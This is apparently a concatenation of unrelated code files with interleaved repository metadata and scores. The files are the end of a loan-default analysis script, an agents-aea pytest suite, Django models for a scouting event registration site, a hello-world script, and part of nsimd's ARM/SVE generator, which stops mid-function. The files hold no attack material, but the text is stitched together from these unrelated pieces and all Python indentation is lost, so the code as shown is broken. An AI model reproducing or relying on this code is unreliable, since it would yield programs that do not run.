"L-Very High Risk", "M-Very High Risk", "No Bureau History Available", "Not Scored: No Activity seen on the customer (Inactive)", \
"Not Scored: Not Enough Info available on the customer", "Not Scored: Sufficient History Not Available", "Not Scored: Only a Guarantor",\
"Not Scored: No Updates available in last 36 months1", "Not Scored: More than 50 active Accounts found"]
# sns.boxplot(x="PERFORM_CNS.SCORE.DESCRIPTION", y="PERFORM_CNS.SCORE", color="b", data=df_subset)
# plt.show()
def df_boxplot(df, xstr, ystr):
sns.boxplot(x=xstr, y=ystr, palette=sns.color_palette(), data=df)
plt.show()
# continuous variable vs a categorical variable: score distribution per risk grade
# (keep the 13 actual risk grades, dropping the "Not Scored"/"No Bureau History" categories)
df_subset = merge_df[merge_df['PERFORM_CNS.SCORE.DESCRIPTION'].isin(score_ranking[:13])]
df_boxplot(df_subset, "PERFORM_CNS.SCORE.DESCRIPTION", "PERFORM_CNS.SCORE")
#continuous variable vs target
df_boxplot(merge_df, "loan_default", "PERFORM_CNS.SCORE")
# t-test
# stats.ttest_ind(a, b, equal_var = False)
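# A hedged sketch of the two-sample t-test hinted at above: compare a continuous
# feature between defaulters and non-defaulters. Assumes merge_df with a binary
# 'loan_default' column, as used earlier in this script.
from scipy import stats
defaulted = merge_df.loc[merge_df['loan_default'] == 1, 'PERFORM_CNS.SCORE'].dropna()
repaid = merge_df.loc[merge_df['loan_default'] == 0, 'PERFORM_CNS.SCORE'].dropna()
t_stat, p_value = stats.ttest_ind(defaulted, repaid, equal_var=False)  # Welch's t-test
print(f"Welch t-test on PERFORM_CNS.SCORE: t={t_stat:.3f}, p={p_value:.4f}")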
| 3.25
| 3
|
tests/test_test_tools/test_test_cases.py
|
marcofavorito/agents-aea
| 0
|
12783487
|
<gh_stars>0
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains a test for aea.test_tools.test_cases."""
import os
import time
from pathlib import Path
import pytest
import aea
from aea.configurations.base import AgentConfig
from aea.mail.base import Envelope
from aea.protocols.base import Message
from aea.protocols.dialogue.base import Dialogue
from aea.test_tools.exceptions import AEATestingException
from aea.test_tools.test_cases import AEATestCase, AEATestCaseEmpty
from packages.fetchai.protocols.default.dialogues import (
DefaultDialogue,
DefaultDialogues,
)
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.skills.echo import PUBLIC_ID as ECHO_SKILL_PUBLIC_ID
from tests.conftest import FETCHAI, MY_FIRST_AEA_PUBLIC_ID
from tests.test_cli import test_generate_wealth, test_interact
TestWealthCommandsPositive = test_generate_wealth.TestWealthCommandsPositive
TestInteractCommand = test_interact.TestInteractCommand
class TestConfigCases(AEATestCaseEmpty):
"""Test config set/get."""
def test_agent_nested_set_agent_crudcollection(self):
"""Test agent test nested set from path."""
key_name = "agent.private_key_paths.cosmos"
self.nested_set_config(key_name, "testdata2000")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"testdata2000" in result.stdout_bytes
def test_agent_nested_set_agent_crudcollection_all(self):
"""Test agent test nested set from path."""
key_name = "agent.private_key_paths"
self.nested_set_config(key_name, {"cosmos": "testdata2000"})
result = self.run_cli_command(
"config", "get", f"{key_name}.cosmos", cwd=self._get_cwd()
)
assert b"testdata2000" in result.stdout_bytes
def test_agent_nested_set_agent_simple(self):
"""Test agent test nested set from path."""
key_name = "agent.registry_path"
self.nested_set_config(key_name, "some_path")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"some_path" in result.stdout_bytes
def test_agent_nested_set_skill_simple(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args.some_key"
self.nested_set_config(key_name, "some_value")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"some_value" in result.stdout_bytes
def test_agent_nested_set_skill_simple_nested(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args.some_key"
self.nested_set_config(f"{key_name}.some_nested_key", "some_value")
def test_agent_nested_set_skill_all(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args"
self.nested_set_config(key_name, {"some_key": "some_value"})
result = self.run_cli_command(
"config", "get", f"{key_name}.some_key", cwd=self._get_cwd()
)
assert b"some_value" in result.stdout_bytes
def test_agent_nested_set_skill_all_nested(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args"
self.nested_set_config(
key_name, {"some_key": {"some_nested_key": "some_value"}}
)
def test_agent_nested_set_connection_simple(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.connections.stub.config.input_file"
self.nested_set_config(key_name, "some_value")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"some_value" in result.stdout_bytes
def test_agent_nested_set_connection_dependency(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.connections.stub.dependencies"
self.nested_set_config(key_name, {"dep": {"version": "==1.0.0"}})
def test_agent_set(self):
"""Test agent test set from path."""
value = True
key_name = "agent.logging_config.disable_existing_loggers"
self.set_config(key_name, value)
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert str(value) in str(result.stdout_bytes)
def test_agent_get_exception(self):
"""Test agent test get non exists key."""
with pytest.raises(Exception, match=".*bad_key.*"):
self.run_cli_command("config", "get", "agent.bad_key", cwd=self._get_cwd())
class TestRunAgent(AEATestCaseEmpty):
"""Tests test for generic cases of AEATestCases."""
def test_run_agent(self):
"""Run agent and test it's launched."""
process = self.run_agent()
assert self.is_running(process, timeout=30)
class TestGenericCases(AEATestCaseEmpty):
"""Tests test for generic cases of AEATestCases."""
def test_disable_aea_logging(self):
"""Call logging disable."""
self.disable_aea_logging()
def test_start_subprocess(self):
"""Start a python subprocess and check output."""
proc = self.start_subprocess("-c", "print('hi')")
proc.wait(10)
assert "hi" in self.stdout[proc.pid]
def test_start_thread(self):
"""Start and join thread for python code."""
called = False
def fn():
nonlocal called
called = True
thread = self.start_thread(fn)
thread.join(10)
assert called
def test_fetch_and_delete(self):
"""Fetch and delete agent from repo."""
agent_name = "some_agent_for_tests"
self.fetch_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
assert os.path.exists(agent_name)
self.delete_agents(agent_name)
assert not os.path.exists(agent_name)
def test_diff(self):
"""Test difference_to_fetched_agent."""
agent_name = "some_agent_for_tests2"
self.fetch_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
self.run_cli_command(
"config", "set", "agent.default_ledger", "test_ledger", cwd=agent_name
)
result = self.run_cli_command(
"config", "get", "agent.default_ledger", cwd=agent_name
)
assert b"test_ledger" in result.stdout_bytes
diff = self.difference_to_fetched_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
assert diff
assert "test_ledger" in diff[1]
def test_no_diff(self):
"""Test no difference for two aea configs."""
agent_name = "some_agent_for_tests3"
self.fetch_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
diff = self.difference_to_fetched_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
assert not diff
def test_terminate_subprocesses(self):
"""Start and terminate long running python subprocess."""
proc = self.start_subprocess("-c", "import time; time.sleep(10)")
assert proc.returncode is None
self._terminate_subprocesses()
assert proc.returncode is not None
def test_miss_from_output(self):
"""Test subprocess output missing output."""
proc = self.start_subprocess("-c", "print('hi')")
assert len(self.missing_from_output(proc, ["hi"], timeout=5)) == 0
assert "HI" in self.missing_from_output(proc, ["HI"], timeout=5)
def test_replace_file_content(self):
"""Replace content of the file with another one."""
file1 = "file1.txt"
file2 = "file2.txt"
with open(file1, "w") as f:
f.write("hi")
with open(file2, "w") as f:
f.write("world")
self.replace_file_content(Path(file1), Path(file2))
with open(file2, "r") as f:
assert f.read() == "hi"
class TestLoadAgentConfig(AEATestCaseEmpty):
"""Test function 'load_agent_config'."""
def test_load_agent_config(self):
"""Test load_agent_config."""
agent_config = self.load_agent_config(self.agent_name)
assert isinstance(agent_config, AgentConfig)
def test_load_agent_config_when_agent_name_not_exists(self):
"""Test load_agent_config with a wrong agent name."""
wrong_agent_name = "non-existing-agent-name"
with pytest.raises(
AEATestingException,
match=f"Cannot find agent '{wrong_agent_name}' in the current test case.",
):
self.load_agent_config(wrong_agent_name)
class TestAddAndEjectComponent(AEATestCaseEmpty):
"""Test add/reject components."""
def test_add_and_eject(self):
"""Test add/reject components."""
result = self.add_item("skill", str(ECHO_SKILL_PUBLIC_ID), local=True)
assert result.exit_code == 0
result = self.eject_item("skill", str(ECHO_SKILL_PUBLIC_ID))
assert result.exit_code == 0
class TestAddAndRemoveComponent(AEATestCaseEmpty):
"""Test add/remove components."""
def test_add_and_eject(self):
"""Test add/reject components."""
result = self.add_item("skill", str(ECHO_SKILL_PUBLIC_ID), local=True)
assert result.exit_code == 0
result = self.remove_item("skill", str(ECHO_SKILL_PUBLIC_ID))
assert result.exit_code == 0
class TestGenerateAndAddKey(AEATestCaseEmpty):
"""Test generate and add private key."""
def test_generate_and_add_key(self):
"""Test generate and add private key."""
result = self.generate_private_key("cosmos")
assert result.exit_code == 0
result = self.add_private_key(
"cosmos", "cosmos_private_key.txt", connection=True
)
assert result.exit_code == 0
result = self.add_private_key("cosmos", "cosmos_private_key.txt")
assert result.exit_code == 0
result = self.remove_private_key("cosmos")
assert result.exit_code == 0
class TestGetWealth(AEATestCaseEmpty):
"""Test get_wealth."""
def test_get_wealth(self):
"""Test get_wealth."""
# just call it, network related and quite unstable
self.get_wealth(FETCHAI)
class TestAEA(AEATestCase):
"""Test agent test set from path."""
path_to_aea = Path("tests") / "data" / "dummy_aea"
def test_scaffold_and_fingerprint(self):
"""Test component scaffold and fingerprint."""
result = self.scaffold_item("skill", "skill1")
assert result.exit_code == 0
result = self.fingerprint_item("skill", "fetchai/skill1:0.1.0")
assert result.exit_code == 0
def test_scaffold_and_fingerprint_protocol(self):
"""Test component scaffold and fingerprint protocol."""
result = self.scaffold_item("protocol", "protocol1")
assert result.exit_code == 0
result = self.fingerprint_item("protocol", "fetchai/protocol1:0.1.0")
assert result.exit_code == 0
class TestSendReceiveEnvelopesSkill(AEATestCaseEmpty):
"""Test that we can communicate with agent via stub connection."""
def test_send_receive_envelope(self):
"""Run the echo skill sequence."""
self.add_item("skill", str(ECHO_SKILL_PUBLIC_ID))
process = self.run_agent()
is_running = self.is_running(process)
assert is_running, "AEA not running within timeout!"
# add sending and receiving envelope from input/output files
sender = "sender"
def role_from_first_message( # pylint: disable=unused-argument
message: Message, receiver_address: str
) -> Dialogue.Role:
return DefaultDialogue.Role.AGENT
default_dialogues = DefaultDialogues(sender, role_from_first_message)
message_content = b"hello"
message = DefaultMessage(
performative=DefaultMessage.Performative.BYTES,
dialogue_reference=default_dialogues.new_self_initiated_dialogue_reference(),
content=message_content,
)
sent_envelope = Envelope(
to=self.agent_name,
sender=sender,
protocol_id=message.protocol_id,
message=message,
)
self.send_envelope_to_agent(sent_envelope, self.agent_name)
time.sleep(2.0)
received_envelope = self.read_envelope_from_agent(self.agent_name)
received_message = DefaultMessage.serializer.decode(received_envelope.message)
assert sent_envelope.message.content == received_message.content
class TestInvoke(AEATestCaseEmpty):
"""Test invoke method."""
def test_invoke(self):
"""Test invoke method."""
result = self.invoke("--version")
assert result.exit_code == 0
assert f"aea, version {aea.__version__}" in result.stdout
| 1.773438
| 2
|
tangram/models.py
|
gutard/django-tangram
| 0
|
12783488
|
# -*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
BRANCHE_CHOICES = (
(1, u"Lutins"),
(2, u"Louveteaux"),
(3, u"Éclés"),
(4, u"Aînés"),
)
EXPLOGRAM_CHOICES = (
(1, u"Le pont des cultures"),
(2, u"On est cap !"),
(3, u"Filles/garçons"),
(4, u"Au fil du temps"),
)
class Unite(models.Model):
branche = models.IntegerField(u"Branche", choices=BRANCHE_CHOICES)
nom = models.CharField(u"Nom de l'unité/équipage", max_length=100)
inscr_explogram = models.NullBooleanField(u"Nous souhaitons participer à l'ExploGRAM")
inscr_congram = models.NullBooleanField(u"Nous souhaitons participer au ConGRAM")
inscr_tangram = models.NullBooleanField(u"Nous souhaitons participer au rassemblement TanGRAM")
theme_explogram = models.CharField(max_length=100, blank=True)
etat_explogram = models.TextField(u"Descriptif de l'ExploGRAM tel qu'il en est aujourd'hui", blank=True)
effectif = models.PositiveIntegerField(u"Effectif approximatif", blank=True, null=True)
contact = models.CharField(max_length=100, blank=True)
tel = models.CharField(max_length=100, blank=True)
user = models.OneToOneField(User)
fg1_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg1_projet = models.TextField(u"Le projet qu'on rêve de réaliser", blank=True)
fg2_votants = models.CharField(u"Nombre de votants", max_length=100, blank=True)
fg2_resultat = models.CharField(u"Résultats des votes", max_length=100, blank=True)
fg2_elus = models.TextField(u"Sont élus", blank=True)
fg2_adresses = models.TextField(u"Adresses", blank=True)
fg2_propositions = models.TextField(u"Nombre de propositions à présenter", blank=True)
fg3_date = models.CharField(u"Date", max_length=100, blank=True)
fg3_temps = models.TextField(u"Temps consacré", blank=True)
fg3_forme = models.TextField(u"Forme adoptée (conseil, jeux,...)", blank=True)
fg4_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg4_description = models.TextField(u"Le projet qu'on rêve de réaliser", blank=True)
fg4_taches = models.BooleanField(u"Nous avons listé les tâches à faire")
fg4_roles = models.BooleanField(u"Nous nous sommes répartis les rôles")
fg4_partenaire = models.BooleanField(u"Nous allons chercher un partenaire")
fg4_materiel = models.BooleanField(u"Nous avons fait la liste du matériel")
fg4_reunions = models.IntegerField(u"Nombre de réunions de préparation", null=True, blank=True)
fg5_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg5_texte = models.TextField(u"La carte postale de l'exploGRAM", blank=True)
fg5_photo = models.ImageField(u"Photo", blank=True, null=True, upload_to='carte_postale/')
fg6_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg6_date = models.CharField(u"Date", max_length=100, blank=True)
fg6_descriptif = models.TextField(u"Descriptif de notre projet", blank=True)
fg6_positifs = models.TextField(u"Les points positifs de notre projet", blank=True)
fg7_theme = models.IntegerField(u"Notre exploGRAM", null=True, blank=True, choices=EXPLOGRAM_CHOICES)
fg7_description = models.TextField(u"Description de notre retransmission", blank=True)
fg7_install = models.CharField(u"Le temps qu'il nous faudra pour l'installer", max_length=100, blank=True)
fg7_presentation = models.CharField(u"Le temps qu'il nous faudra pour le présenter pendant le rassemblement tanGRAM", max_length=100, blank=True)
fg7_espace = models.CharField(u"L'espace qu'il nous faudra", max_length=100, blank=True)
fg7_micro = models.BooleanField(u"Nous aurons besoin d'un micro")
fg7_ecran = models.BooleanField(u"Nous aurons besoin d'un écran")
fg7_expo = models.BooleanField(u"Nous aurons besoin de supports expo")
fg7_autre = models.TextField(u"Nous aurons besoin d'autres choses", blank=True)
fg1_ok = models.BooleanField(u"Gram attribué")
fg2_ok = models.BooleanField(u"Gram attribué")
fg3_ok = models.BooleanField(u"Gram attribué")
fg4_ok = models.BooleanField(u"Gram attribué")
fg5_ok = models.BooleanField(u"Gram attribué")
fg6_ok = models.BooleanField(u"Gram attribué")
fg7_ok = models.BooleanField(u"Gram attribué")
nb_grams = models.IntegerField(u"nombre de grams", default=0)
def save(self, *args, **kwargs):
self.nb_grams = sum([int(getattr(self, 'fg%u_ok' % i)) for i in range(1, 8)])
super(Unite, self).save(*args, **kwargs)
class FicheAction(models.Model):
titre = models.CharField(u"Titre", max_length=100)
par = models.CharField(u"Action réalisée par", max_length=100, blank=True)
public = models.TextField(u"Description public (âge, autonomie, effectif…)", blank=True)
deroule = models.TextField(u"Descriptif du déroulé", blank=True)
activite = models.CharField(u"Type d'activité (grand jeux, forum, projet de longue durée…)", max_length=100, blank=True)
objectifs = models.TextField(u"Objectifs", blank=True)
place = models.TextField(u"Place dans une démarche d'année (lancement, construction, conclusion…)", blank=True)
duree = models.CharField(u"Durée", max_length=100, blank=True)
lancement = models.TextField(u"Place dans les respos dans le lancement", blank=True)
realisation = models.TextField(u"Place dans les respos dans la réalisation", blank=True)
valorisation = models.TextField(u"Place dans les respos dans la valorisation", blank=True)
biblio = models.TextField(u"Bibliographie", blank=True)
partenaires = models.TextField(u"Les partenaires (si c'est le cas)", blank=True)
matos = models.TextField(u"Besoins matériels", blank=True)
annexe = models.FileField(u"Annexes jointes", blank=True, upload_to='fiche_action')
user = models.ForeignKey(User)
def __unicode__(self):
return self.titre
| 2.046875
| 2
|
hello_git.py
|
zhengwenhong/landsat578-water
| 0
|
12783489
|
<gh_stars>0
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
print('Hello git, this is <NAME>')
| 1.875
| 2
|
egg/platform_arm.py
|
TheMartianObserver/nsimd
| 247
|
12783490
|
<reponame>TheMartianObserver/nsimd<filename>egg/platform_arm.py
# Copyright (c) 2020 Agenium Scale
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This file gives the implementation of platform ARM, i.e. ARM SIMD.
# Reading this file is rather straightforward. ARM SIMD extensions are rather
# coherent and consistent. It implements the following architectures:
# - ARMv7 -> 128 bits registers without f16 and f64 support
# - Aarch32 -> 128 bits registers with optional f16 and without f64 support
# - Aarch64 -> 128 bits registers with optional f16 and f64 support
# - SVE -> up to 2048 bits registers
# The first three SIMD extensions are collectively called NEON. Aarch32 and
# Aarch64 correspond respectively to ARMv8 32 and 64 bits chips. Note that
# the ARM documentation says that ARMv7, Aarch32 are different but it seems
# that they differ by only a handful of intrinsics which are not in the scope
# of NSIMD so we have implemented the following:
#
# - ARMv7 \ -> neon128
# - Aarch32 /
# - Aarch64 -> aarch64
# - SVE -> sve
import common
# -----------------------------------------------------------------------------
# Helpers
def neon_typ(typ):
prefix = {'i': 'int', 'u': 'uint', 'f': 'float'}
return '{}{}x{}_t'.format(prefix[typ[0]], typ[1:], 128 // int(typ[1:]))
def half_neon64_typ(typ):
prefix = {'i': 'int', 'u': 'uint', 'f': 'float'}
return '{}{}x{}_t'.format(prefix[typ[0]], typ[1:], 64 // int(typ[1:]))
def sve_typ(typ):
prefix = {'i': 'svint', 'u': 'svuint', 'f': 'svfloat'}
return '{}{}_t'.format(prefix[typ[0]], typ[1:])
def suf(typ):
if typ[0] == 'i':
return 's{}'.format(typ[1:])
else:
return typ
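# For reference, example mappings produced by the helpers above:
#   neon_typ('f32')        -> 'float32x4_t'
#   half_neon64_typ('u16') -> 'uint16x4_t'
#   sve_typ('i64')         -> 'svint64_t'
#   suf('i32')             -> 's32'      (suf('f16') stays 'f16')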
neon = ['neon128', 'aarch64']
fixed_sized_sve = ['sve128', 'sve256', 'sve512', 'sve1024', 'sve2048']
sve = ['sve'] + fixed_sized_sve
fmtspec = {}
def convert_from_predicate(opts, op):
if opts.sve_emulate_bool:
return '''svsel({op},
svdup_n_u{typnbits}_x({svtrue}, (u{typnbits})~0),
svdup_n_u{typnbits}_x({svtrue}, 0))'''. \
format(op=op, **fmtspec)
else:
return op
def convert_to_predicate(opts, op):
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return '''svcmpeq({svtrue}, (svuint{typnbits}_t){op},
svdup_n_u{typnbits}_x({svtrue},
(u{typnbits})~0))'''.format(op=op, **fmtspec)
else:
return op
# -----------------------------------------------------------------------------
# Implementation of mandatory functions for this module
def get_simd_exts():
return ['neon128', 'aarch64', 'sve', 'sve128', 'sve256', 'sve512',
'sve1024', 'sve2048']
def get_prev_simd_ext(simd_ext):
if simd_ext in ['neon128', 'aarch64']:
return 'cpu'
elif simd_ext in sve:
return 'aarch64'
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
def emulate_fp16(simd_ext):
if not simd_ext in get_simd_exts():
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
if simd_ext in sve:
return False
else:
return True
def get_type(opts, simd_ext, typ, nsimd_typ):
if simd_ext in neon:
if typ == 'f64':
if simd_ext == 'neon128':
return 'typedef struct {{ double v0; double v1; }} {};'. \
format(nsimd_typ)
else:
return 'typedef {} {};'.format(neon_typ('f64'), nsimd_typ)
elif typ == 'f16':
return '''
#ifdef NSIMD_ARM_FP16
typedef float16x8_t {nsimd_typ};
#else
typedef struct {{ float32x4_t v0; float32x4_t v1; }}
{nsimd_typ};
#endif
'''.format(nsimd_typ=nsimd_typ) # extra \n are necessary
else:
return 'typedef {} {};'.format(neon_typ(typ), nsimd_typ)
elif simd_ext == 'sve':
return 'typedef {} {};'.format(sve_typ(typ), nsimd_typ)
elif simd_ext in fixed_sized_sve:
return 'typedef {} {} __attribute__((arm_sve_vector_bits({})));'. \
format(sve_typ(typ), nsimd_typ, simd_ext[3:])
else:
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
def get_logical_type(opts, simd_ext, typ, nsimd_typ):
if typ not in common.types:
raise ValueError('Unknown type "{}"'.format(typ))
if simd_ext not in get_simd_exts():
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
if typ in common.ftypes + common.itypes:
typ2 = 'u{}'.format(typ[1:]);
else:
typ2 = typ
if simd_ext == 'neon128':
if typ == 'f16':
return \
'''
#ifdef NSIMD_ARM_FP16
typedef uint16x8_t {nsimd_typ};
#else
typedef struct {{ uint32x4_t v0; uint32x4_t v1; }} {nsimd_typ};
#endif
'''.format(nsimd_typ=nsimd_typ) # extra \n are necessary
elif typ == 'f64':
return 'typedef struct {{ u64 v0; u64 v1; }} {};'.format(nsimd_typ)
else:
return get_type(opts, simd_ext, typ2, nsimd_typ)
if simd_ext == 'aarch64':
if typ == 'f16':
return get_logical_type(opts, 'neon128', 'f16', nsimd_typ)
else:
return get_type(opts, simd_ext, typ2, nsimd_typ)
elif simd_ext in sve:
if opts.sve_emulate_bool:
return get_type(opts, simd_ext, 'u' + typ[1:], nsimd_typ)
elif simd_ext in fixed_sized_sve:
return \
'typedef svbool_t {} __attribute__((arm_sve_vector_bits({})));'. \
format(nsimd_typ, simd_ext[3:])
else:
return 'typedef svbool_t {};'.format(nsimd_typ)
def get_nb_registers(simd_ext):
if simd_ext in neon:
return '16'
elif simd_ext in sve:
return '32'
else:
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
def get_native_soa_typ(simd_ext, typ, deg):
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }[typ[0]]
if simd_ext in sve:
return 'sv{}x{}_t'.format(prefix + typ[1:], deg)
else:
return '{}{}x{}x{}_t'.format(prefix, typ[1:], 128 // int(typ[1:]),
deg)
def get_SoA_type(simd_ext, typ, deg, nsimd_typ):
if simd_ext != 'sve':
raise ValueError('SIMD extension must be "sve"')
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }[typ[0]]
return 'typedef {} {};'.format(get_native_soa_typ(simd_ext, typ, deg),
nsimd_typ)
def has_compatible_SoA_types(simd_ext):
if simd_ext not in neon + sve:
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
return False
# -----------------------------------------------------------------------------
def get_additional_include(func, platform, simd_ext):
ret = '''#include <nsimd/cpu/cpu/{}.h>
'''.format(func)
if simd_ext in sve:
ret += '''#include <nsimd/arm/aarch64/{}.h>
'''.format(func)
if func in ['load2u', 'load3u', 'load4u', 'load2a', 'load3a', 'load4a']:
deg = func[4]
ret += '''#if NSIMD_CXX > 0
extern "C" {{
#endif
NSIMD_INLINE nsimd_{simd_ext}_vu16x{deg}
nsimd_{func}_{simd_ext}_u16(const u16*);
# if NSIMD_CXX > 0
}} // extern "C"
#endif
'''.format(func=func, deg=deg, simd_ext=simd_ext)
if func in ['mask_storea1', 'mask_storeu1', 'masko_loada1',
'masko_loadu1', 'maskz_loada1', 'maskz_loadu1'] and \
simd_ext not in sve:
ret += '''#include <nsimd/scalar_utilities.h>
'''
if func == 'mask_for_loop_tail' and simd_ext not in sve:
ret += '''#include <nsimd/arm/{simd_ext}/set1.h>
#include <nsimd/arm/{simd_ext}/set1l.h>
#include <nsimd/arm/{simd_ext}/iota.h>
#include <nsimd/arm/{simd_ext}/lt.h>
'''.format(simd_ext=simd_ext)
if simd_ext == 'neon128' and func == 'notl':
ret += '''#include <nsimd/arm/neon128/notb.h>
'''
if simd_ext in neon and func == 'ne':
ret += '''#include <nsimd/arm/{simd_ext}/eq.h>
# include <nsimd/arm/{simd_ext}/notl.h>
'''.format(simd_ext=simd_ext)
if simd_ext in neon and func in ['fms', 'fnms']:
ret += '''#include <nsimd/arm/{simd_ext}/ne.h>
#include <nsimd/arm/{simd_ext}/fma.h>
#include <nsimd/arm/{simd_ext}/fnma.h>
'''.format(simd_ext=simd_ext)
if func == 'shra':
ret += '''#include <nsimd/arm/{simd_ext}/shr.h>
'''.format(simd_ext=simd_ext)
if func in ['loadlu', 'loadla']:
ret += '''#include <nsimd/arm/{simd_ext}/eq.h>
# include <nsimd/arm/{simd_ext}/set1.h>
# include <nsimd/arm/{simd_ext}/{load}.h>
# include <nsimd/arm/{simd_ext}/notl.h>
'''.format(load='load' + func[5], simd_ext=simd_ext)
if func in ['storelu', 'storela']:
ret += '''#include <nsimd/arm/{simd_ext}/if_else1.h>
# include <nsimd/arm/{simd_ext}/set1.h>
# include <nsimd/arm/{simd_ext}/{store}.h>
'''.format(store='store' + func[6], simd_ext=simd_ext)
if func == 'to_logical':
ret += '''#include <nsimd/arm/{simd_ext}/reinterpret.h>
#include <nsimd/arm/{simd_ext}/ne.h>
''' .format(simd_ext=simd_ext)
if func == 'zip':
ret += '''#include <nsimd/arm/{simd_ext}/ziplo.h>
#include <nsimd/arm/{simd_ext}/ziphi.h>
'''.format(simd_ext=simd_ext)
if func == 'unzip':
ret += '''#include <nsimd/arm/{simd_ext}/unziplo.h>
#include <nsimd/arm/{simd_ext}/unziphi.h>
'''.format(simd_ext=simd_ext)
if func == 'adds':
ret += '''#include <nsimd/arm/{simd_ext}/add.h>
'''.format(simd_ext=simd_ext)
if func == 'subs':
ret += '''#include <nsimd/arm/{simd_ext}/sub.h>
'''.format(simd_ext=simd_ext)
if func in ['gather', 'scatter'] and simd_ext == 'sve':
ret += '''#include <nsimd/arm/sve/len.h>
'''
return ret
# -----------------------------------------------------------------------------
# Emulators
def emulate_op1(op, simd_ext, typ):
if simd_ext in neon:
le = 128 // int(typ[1:]);
return '''int i;
{typ} buf[{le}];
vst1q_{suf}(buf, {in0});
for (i=0; i < {le}; i += nsimd_len_cpu_{typ}()) {{
nsimd_storeu_cpu_{typ}( & buf[i], nsimd_{op}_cpu_{typ}(
nsimd_loadu_cpu_{typ}(&buf[i])));}}
return vld1q_{suf}(buf); '''. \
format(op=op, le=le, **fmtspec)
if simd_ext in sve:
le = 2048 // int(typ[1:]);
return '''int i;
{typ} buf[{le}];
svst1_{suf}({svtrue}, buf, {in0});
for (i=0; i < nsimd_len_{simd_ext}_{typ}();
i += nsimd_len_cpu_{typ}()) {{
nsimd_storeu_cpu_{typ}( & buf[i], nsimd_{op}_cpu_{typ}(
nsimd_loadu_cpu_{typ}(&buf[i])));}}
return svld1_{suf}({svtrue}, buf); '''. \
format(op=op, le=le, **fmtspec)
def emulate_op2(op, simd_ext, typ):
if simd_ext in neon:
le = 128 // int(typ[1:]);
return '''int i;
{typ} buf0[{le}], buf1[{le}];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
for (i=0; i < {le}; i++) {{
buf0[i] = ({typ})(buf0[i] {op} buf1[i]);}}
return vld1q_{suf}(buf0); '''. \
format(op=op, le=le, **fmtspec)
if simd_ext in sve:
le = 2048 // int(typ[1:]);
return '''int i;
{typ} buf0[{le}], buf1[{le}];
svst1_{suf}({svtrue}, buf0, {in0});
svst1_{suf}({svtrue}, buf1, {in1});
for (i=0; i < nsimd_len_{simd_ext}_{typ}(); i++) {{
buf0[i] = ({typ})(buf0[i] {op} buf1[i]);}}
return svld1_{suf}({svtrue}, buf0); '''. \
format(op=op, le=le, **fmtspec)
def emulate_lop2_neon(opts, op, simd_ext, typ):
le = 128 // int(typ[1:]);
ltyp = get_logical_type(opts, simd_ext, typ)
lsuf = suf(ltyp)
return '''int i;
